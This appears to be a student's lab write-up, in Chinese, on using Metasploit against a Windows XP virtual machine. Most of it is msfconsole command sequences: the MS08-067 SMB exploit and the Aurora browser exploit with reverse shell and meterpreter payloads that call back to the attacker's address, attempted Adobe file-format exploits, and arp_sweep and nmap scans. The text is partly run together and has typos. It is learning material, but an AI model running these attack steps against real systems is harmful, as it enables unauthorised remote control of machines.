encode:編碼器,對代碼進行異或運算、去除壞字符等等,保護payload不被發現shell
kali ip:192.168.120.136windows
調用該模塊,而且查看可使用的payload
use exploit/windows/smb/ms08_067_netapi
show payloads
api
set payload generic/shell_reverse_tcp
設置payload,tcp反向回連set LHOST 192.168.120.136
攻擊機kali ipset LPORT 4308
攻擊端口set RHOST 192.168.120.135
靶機winxp ipset target 0
自動選擇目標系統類型,匹配度較高show options
看一下配置是否都正確exploit
開始監聽。攻擊不成功,忘記截圖,盜了別人的一張圖,是如出一轍的錯誤。參照別人的博客,檢查了防火牆是關着的,端口是在監聽的,兩臺虛擬機也是能夠ping通的……成功獲取win xp的系統權限
瀏覽器
msf > use windows/browser/ms10_002_aurora
調用該模塊set payload windows/meterpreter/reverse_http
設置http反向回連set URIPATH 4308zss
設置統一資源標識符路徑http://192.168.120.136:8080/4308zss
ipconfig
試一下use exploit/mulit/fileformat/adobe_u3d_meshcont
選用該模塊,可是好像用不了use exploit/windows/fileformat/adobe_cooltype_sing
換一個模塊set payload windows/meterpreter/reverse_tcp
設置tcp反向回連show options
查看要設置哪些東西ipconfig
arp_sweep
模塊,這是一個能夠掃描端口、各類鏈接等等的模塊use auxiliary/scanner/discovery/arp_sweep
進入該模塊show options
查看要設置的東西set interface eth0
,set RHOSTS 192.168.120.135
設置靶機ip,set threads 2
設置過程忘記截圖了run
開啓掃描,成功地掃描到靶機namp 192.168.120.135
開啓nmap掃描,能夠看見開啓的端口號,以及靶機的操做系統還和以前的後門攻擊同樣,怎麼去保證攻擊機ip的穩定安全
此次的實驗操做起來蠻簡單,幾乎是如出一轍的操做步驟,讓我瞭解到msf的強大。
經過此次實驗也讓我看到了漏洞竟是如此之多,之後要常打補丁,可能會有用吧tcp